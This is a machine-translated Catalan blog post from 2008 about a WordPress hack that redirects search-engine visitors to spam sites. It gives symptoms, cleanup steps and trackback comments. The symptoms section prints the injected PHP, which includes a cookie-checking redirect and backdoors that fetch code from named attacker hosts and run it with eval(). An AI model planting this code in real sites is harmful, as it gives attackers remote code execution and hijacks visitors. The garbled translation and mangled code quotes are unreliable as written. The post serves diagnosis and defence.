Tall de WordPress: Recuperi's i Prepari Golden-Info.net i uns Altres Llocs Il·legals a Google i a Motor de Cerca o a Gens de Tràfic de Galeta Redirigit a Your-Needs.info, AnyResults.Net
Els pirates informàtics estan sortint tot per tallar i explota WordPress blogs oferts pertot arreu el web, que planten i que injecten codi delictiu a codis de WordPress i base de dades per redirigir visitants i colpeix de Google i uns altres motors de cerca a llocs de spam com your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us i molts altres llocs de spam que s'omplien amb pay-per-click anuncis de CPC. Algun tall sembla apuntar multitud més gran redirigint tot sense galeta de WordPress. Sense estat tallat, aquests tràfic per suposadament arribar al blog com destinació.
Símptomes del Tall Redirecció de Motor de Cerca
Fixi's que no tots els símptomes poden passar conjuntament. Hi pot haver més que no un mètode de talls existia, la qual cosa contribuïa a descobriment diferent i resolució possible.
- Qualsevol clic per de motors de cerca com Google, Yahoo, AOL, MSN, Windows Viure resultats de la cerca, incloent-hi nom de blog, serà redirigit i enviava als llocs de pirata informàtic com your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, amb la llista segur créixer. L'espectador arriba a la pàgina de pirates informàtics amb la mateixa corda de recerca que ell o ella solia buscar al motor de cerca.
- Faci clic a un enllaç al blog en lector de menjar de RSS com lector Google pot ser redirigit a lloc de pirates informàtics també.
- Un visitant sense compte sobre el blog, o no connexió (per això fa no té galeta detectada pel codi delictiu), serà redirigit a llocs de spam.
- Només visites de motor de cerca són estat redirigit fora, i el truc aconseguir enganyar al voltant probablement molts bloggers, servidors web i propietaris de llocs, o com a mínim retardar la descoberta del problema.
- Sobtat enorme i dramàtic deixar i perdre de quantitat massiva de visitants trafiquen i cridar vistes en l'estadística de rastrejadors de webs, especialment tràfic amb Google com referrer, tot i que l'ordenació de resultats de motor de cerca està intacta.
- Gota Massic d'ingrés de publicitat des de Google l'AdSense o uns altres anuncis difonen, o afilien comissions.
- El després de base64 PHP codificat codifica pot aparèixer a l'arxiu de wp-blog-header.php:
<?php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> - Una imatge, que és de fet un grapat de codi de PHP delictiu, s'afegia al guia de wp-contents/uploads. Per exemple, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, o pot ser dins de la seva carpeta de tema, i.e. wp-contents/themes/classic/images/xyz.jpg. El nom de la imatge pot ser en el format de xxxxxx_old.jpeg.
- Una entrada s'introduïa en la base de dades de MySQL perquè WordPress wp_options activi la imatge (el PHP delictiu codifica) com a plugin, típicament com rss_f541b3abd05e7962fcab37737f40fad8.
- Hi pot haver també codis delictius, especialment els que feien d'intèrpret amb eval() o base64_decode() manen estat introduït a uns altres arxius de WordPress PHP. Els exemples són els codis següents:
if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
}if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}eval(gzinflate(base64_decode( - Tema de WordPress és a dir estat activat i utilitzava pot ser injectat amb tallar codi i ser afectat també. Tal codi normalment existeix en header.php o índex. php del tema, i té similar una línia al per sota
if($ser=="1 && sizeof($_COOKIE)==0){ header("Location:
Que el tràfic de recerca de WordPress redirigeix al tall de llocs de spam passa probablement a causa de forat de seguretat i vulnerabilitat que no s'adoba quan propietari de blog decideix no millorar a última versió de WordPress (encara que alguns informes que els seus blogs estat tallat tot i que és ja en l'última versió de WordPress 2.5.1). Qualsevol cosa la causa, aquí és el destret i solució per resoldre i per derrotar el tall per assegurar que tingui altra vegada el tràfic i eviti estat penalitzat per Google per irracional redirigir a pàgines de spam.
- Reserva la base de dades de WordPress.
- Utilitzi phpMyAdmin per mirar taules de base de dades de WordPress MySQL. Vagi-se'n a taula de wp_options, i llavors editi la baralla anomenada active_plugins. La baralla detalla tots els plugins actius que ha estat activat. Vagi-se'n a través de la llista (en una línia), i miri per un un plugin anomenat acabat amb una ampliació d'imatge, com .jpg, .jpeg, .gif i etc. Per exemple, abcdefgh_old.jpeg. Bitllet avall el camí a l'arxiu d'imatge.
- Utilitzant sFTP o SSH (oblidi's de FTP o Telnet per a la seguretat), llavors navega al camí de l'arxiu, i suprimeix l'arxiu.
- Vagi-se'n a plafó Plugins d'Administrador de WordPress, desactivi's o activi qualsevol plugin per liquidar el plugin delictiu des de la baralla de "active_plugins".
- Faci retrocedir a phpMyAdmin, a la taula de wp_options, trobi una baralla que conté la corda següent com option_name:
rss_f541b3abd05e7962fcab37737f40fad8Suprimeixi la baralla fora.
Si no sap com realitzar la neteja de base de dades detallada en passos a dalt, aquí és una classe de vídeo:
- Vagi-se'n a taula de wp_users. Si hi ha un anònim usuari (valor nul en camp de user_nicename) creat a les 00:00:00 en 0000-00-00, bitllet avall l'identificador d'usuari (Camp d'ID, un nombre). Suprimeixi l'usuari.
- Miri la taula de wp_usermeta. Localitzi totes les baralles amb partits de user_id els ID de l'usuari il·legal suprimit. Hi ha normalment tres baralles estat associat a l'ID d'usuari d'invasor. Suprimir totes les baralles associades.
- Connecti's al servidor per editar els arxius de tema, o mirar el codi dels arxius de tema en Editor de Tema de plafó de Disseny d'Administrador de WordPress. Comprovi l'header.php i indexi. php per a qualsevol codi sospitós. Com esmentat a dalt, busqui alguna cosa similar a la línia sota:
if($ser=="1 && sizeof($_COOKIE)==0){ header("Location:Si se'l troba, suprimeixi i tregui el codi. Fixi's que el codi delictiu seran unes quantes línies molt de temps en total.
- Si ja no ha existit, creï un arxiu d'index.html buit en el guia de wp-contents/plugins. El buit index.html amaga el contingut del guia de plugins, eficaçment protegeix quins plug-ins estat utilitzat de pirates informàtics per endurir i per estrènyer la seguretat de WordPress.
- Carregui i reemplaci cada un i tots els WordPress arxiven (no només wp-blog-header.php) al servidor amb l'última versió fresca, neta, i original des de WordPress (naturalment, excepte pocs arxius com wp-config.php i temes). Si està millorant, llegeixi el guia prudentment.
- Canviï la seva contrasenya.
- Si té usuaris múltiples, canviï el seu contrasenya (o demanar-los que canviï la contrasenya) també.
IMPORTANT: La pàgina és màquina traduïda i proporcionada "com és" sense garantia. La traducció automàtica pot ser difícil d'entendre. Si us plau refereixi's a article anglès original quan sigui que possible.
Articles Relacionats
- Integri'S i Mostri Google AdSense per a la Recerca i Co-Op Custom Search Engine Results en Plantilla de Pàgina de WordPress Blog
- Canviï Google Blog Search per Technorati per a Enllaços Nous en Quadre de Comandament de WordPress
- StatTraq - Wordpress Plugin per a Estadística de Lloc i Taulell de Tràfic
- Aquest Lloc Pot Fer malbé el Seu Ordinador Sobre Tots els Errors de Llocs en Resultats de la Cerca Google
- Talli per Buscar i Veure Webcam Viu Lliure amb la Recerca Google
- Wikiasari - Motor de Cerca de Costum de Co-op de Google, Digg o StumbleUpon per a Wikipedia?
- Ple Conjunt de Recollida de Logo de Vacances de Motor de Cerca Google (1998 - 2007)
- WordPress Plugin: Mostri Analítica de Google i Estadística d'Informes de FeedBurner del Lloc Admin
- Com Restaurar Contrasenya de WordPress per Recobrar Secret Oblidat
Entrades (RSS)
12 de desembre, 2008 17:03
[...] Tall de WordPress: Recobri i Arregli Google i Motor de Cerca o Gens de Tràfic de Galeta Redirigit a Your-Nee... [...]
21 de novembre, 2008 13:25
Només estic venint fora d'aquest problema.
El meu wp-blog-header.php es carregava amb el codi d'endergues que redirigia tot el motor de cerca fora del meu lloc. En tenia ZERO tràfic de motor de cerca durant quatre dies.
wp-blog-header.php, que és de fet 1KB, es carregava amb 19KB de codi delictiu. Només netejant no serà suficient, tampoc, perquè l'arxiu vell no permet sobreescriure o suprimir. Havia de manipular al voltant d'amb permissions.
Gràcies per a aquest correu que en llançava alguns extra trobar-se amb la meva situació.
De fet sóc tan paranoic ara ni tan sols no vull esmentar el nom del meu lloc web aquí!
31 d'octubre, 2008 11:53
[...] cara lebih lengkapnya buat nanggulangin masalah ini, baca aja disini. [...]
25 de juliol, 2008 09:49
[...] avere una merda vingut diesserlo de quella tra le mani.Se siete già stati infestati o pensate, qui e qui troverete le specifiche dell'exploit e alcuni consigli utili per [...]
17 de juliol, 2008 10:30
[...] Tall de WordPress: Recuperi'S i Fixi Google i el Motor de Cerca o Gens de Tràfic de Galeta Redirigia a Your-Nee.... [...]
15 de juliol, 2008 08:10
[...] jo agafat això d'hora en i s'assegurava per treure tot el codi delictiu. Aquí és la classe bonica damunt com netejar el seu lloc si això havia de passar a [...]
3 de juliol, 2008 03:08
[...] circa dau sema unde e buba de sa-mi, discutie la cafea d'intr-o d'Eugen de spus de fi de mi-ar de daca nu, circa un vad de sa-l de pe Google si ar fi bine d'enllaç de gasit un. MyDigitalLife.info, au publicat un articol cu titlul : [...]
18 de juny, 2008 22:08
[...] la Meva Vida Digital - els WordPress Tallen: Recobri i Arregli Google i Motor de Cerca o Gens de Tràfic de Galeta Redi... [...]
13 de juny, 2008 13:36
[...] Tall de WordPress: Recuperi'S i Fixi Google i el Motor de Cerca o Gens de Tràfic de Galeta Redirigia - el Meu Digita... Tall de WordPress: Recuperi's i Fix Google i Motor de Cerca o Gens de Tràfic de Galeta Redirigien a Your-Needs.info, AnyResults.Net, Golden-Info.net i uns Altres Llocs Il·legals » la Meva Vida Digital (cordons: seguretat de wordpress) [...]
13 de juny, 2008 12:00
[...] la Meva Vida Digital - els WordPress Tallen: Recobri i Arregli Google i Motor de Cerca o Gens de Tràfic de Galeta Redi... [...]
12 de juny, 2008 19:40
[...] kita de WordPress de blog de peringkat Kalau diGoogle tetap untuk keyword kita, tapi pengunjung turun drastis, hati-hati, dan de tall de bisa jadi itu artinya blog kita kena di redirigir ke situs spam. [...]
12 de juny, 2008 14:43
[...] Tall de WordPress: Recobri i Arregli Google i Motor de Cerca o Gens de Tràfic de Galeta Redirigit a Your-Nee... Comparteixi o Enviï Això a l'Esfera d'amics: ContentWant explicat més programari de webs revisa? Llavors asseguri's que se subscrigui al nostre menjar de RSS o aconsegueixi el nostre customizable widget i l'arreli al seu lloc! Correus relacionats WordPress - la majoria utilitzava programari de blog de font obert [...]
12 de juny, 2008 11:14
[...] wersja WP 2.5.1 bya naraona na jakie problemy. Un w caym tym zamieszaniu, Tall Redirecció de Motor de Cerca de zwanym ju, chodzi o przekierowanie ruchu z wyszukiwarek, gównie Google, cho nie tylko, na specjalnie [...]
12 de juny, 2008 10:06
[...] la Meva Vida Digital - els WordPress Tallen: Recobri i Arregli Google i Motor de Cerca o Gens de Tràfic de Galeta Redi... [...]